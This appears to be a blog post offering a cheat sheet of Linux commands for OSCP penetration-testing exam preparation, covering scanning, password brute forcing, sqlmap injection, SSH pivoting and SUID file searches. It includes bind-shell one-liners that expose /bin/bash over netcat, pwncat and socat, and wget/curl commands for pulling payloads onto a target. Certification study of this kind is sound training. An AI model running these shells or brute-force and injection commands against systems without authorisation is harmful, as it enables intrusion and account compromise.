Top 10 commands to pass the OSCP certification (Updated!)

Try harder and get the d*** certification!

black laptop computer turned on with green screen

Penetration testers often use various Linux commands for reconnaissance, vulnerability assessment, exploitation, and post-exploitation.

Here are ten important Linux commands for penetration testers that want to crack the OSCP certification at the first attempt:

Give a try to my 💰 Smart Contract Security Analysis Platform: SecurityDegen! On-chain scans and security patterns search.

  • nmap / us: Port scanners for network discovery and security auditing.

nmap -sS -p- $IP

nmap --script=snmp-brute $IP

nmap --scripts default,safe $IP

us -mT -Iv $IP:a -r 3000 -R 3 && us -mU -Iv $IP:a -r 3000 -R 3

More scanning commands:

  • enum4linux: Tool for enumerating information from Windows and Samba systems.
enum4linux -a <target>
  • ffuz: For targeted web files and folders brute forcing.

ffuf -w /path/to/wordlist -u https://target/FUZZ

ffuf --input-cmd 'radamsa --seed $FFUF_NUM example1.txt example2.txt' -H "Content-Type: application/json" -X POST -u -mc all -fc 400
  • hydra: Password-cracking tool supporting various protocols.

hydra -l <username> -P <password-list> <target> <protocol>

More password cracking commands:

  • sqlmap: Automated SQL injection and database takeover tool.
sqlmap -u "http://<target>/page.php?id=1" --dbs

More SQL injection tricks:

  • metasploit-framework: Framework for developing, testing, and using exploit code.

  • ssh for tunneling connections from a hacked machine to yours bypassing firewalls:

ssh -L <localhost port>:<remote IP>:<remote port> $IP

ssh -R <server side port>:<localhost>:<local port> $IP


More pivoting commands:

  • netcat (nc) / ncat / pwncat / socat : Networking utility for reading and writing data across network connections.

nc -nvv -lp 8080

nc -nvvlp 8989 -e /bin/bash

pwncat -l -e '/bin/bash' 8080 -k

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

More commands for direct and reverse shells:

  • wget / curl: Download files from the internet, useful for transferring payloads.

wget http://$URL/$FILE

curl -o file.bin -k http://$URL/$FILE
  • find: Search for files and directories based on various criteria.

find / -perm -4000 -ls 2> /dev/null

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

find / -name "*.txt" -ls 2> /dev/null

find / -name "*.log" -ls 2> /dev/null

These commands are just a starting point, and the usage may vary based on the specific scenario and target environment.






Leave a Reply

Your email address will not be published. Required fields are marked *